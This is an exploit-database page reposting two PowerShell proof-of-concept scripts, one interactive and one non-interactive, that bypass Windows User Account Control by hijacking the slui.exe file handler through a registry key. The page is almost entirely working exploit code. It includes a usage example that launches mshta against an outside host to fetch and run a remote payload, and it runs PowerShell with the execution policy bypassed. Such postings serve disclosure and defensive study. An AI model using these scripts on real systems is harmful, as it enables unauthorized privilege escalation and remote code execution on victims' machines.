Lucene search
K

Microsoft Windows UAC Protection Bypass

🗓️ 17 Jun 2019 00:00:00Reported by gushmazukoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 190 Views

Microsoft Windows UAC Protection Bypass via SluiFileHandlerHijackLPE, proof of concept scripts to bypass UAC, execute arbitrary commands, and escalate privileges

Code
`Interactive Version:  
  
<#  
.SYNOPSIS  
This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE  
.NOTES  
Function : SluiHijackBypass  
File Name : SluiHijackBypass.ps1  
Author : Gushmazuko  
.LINK  
https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1  
Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation  
.EXAMPLE  
Load "cmd.exe" (By Default used 'arch 64'):  
SluiHijackBypass -command "cmd.exe" -arch 64  
  
Load "mshta http://192.168.0.30:4444/0HUGN"  
SluiHijackBypass -command "mshta http://192.168.0.30:4444/0HUGN"  
#>  
  
function SluiHijackBypass(){  
Param (  
  
[Parameter(Mandatory=$True)]  
[String]$command,  
[ValidateSet(64,86)]  
[int]$arch = 64  
)  
  
#Create registry structure  
New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force  
Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $command -Force  
  
#Perform the bypass  
switch($arch)  
{  
64  
{  
#x64 shell in Windows x64 | x86 shell in Windows x86  
Start-Process "C:\Windows\System32\slui.exe" -Verb runas  
}  
86  
{  
#x86 shell in Windows x64  
C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\System32\slui.exe -Verb runas"  
}  
}  
  
#Remove registry structure  
Start-Sleep 3  
Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force  
}  
  
  
################################################################################  
  
  
Non-Interactive Version:  
  
<#  
.SYNOPSIS  
Noninteractive version of script, for directly execute.  
This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE  
.NOTES  
File Name : SluiHijackBypass_direct.ps1  
Author : Gushmazuko  
.LINK  
https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass_direct.ps1  
Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation  
.EXAMPLE  
Load "cmd.exe" (By Default used 'arch 64'):  
powershell -exec bypass .\SluiHijackBypass_direct.ps1  
#>  
  
$program = "cmd.exe"  
New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force  
Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $program -Force  
#For x64 shell in Windows x64:  
Start-Process "C:\Windows\System32\slui.exe" -Verb runas  
#For x86 shell in Windows x64:  
#C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process "C:\Windows\System32\slui.exe" -Verb runas"  
Start-Sleep 3  
Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation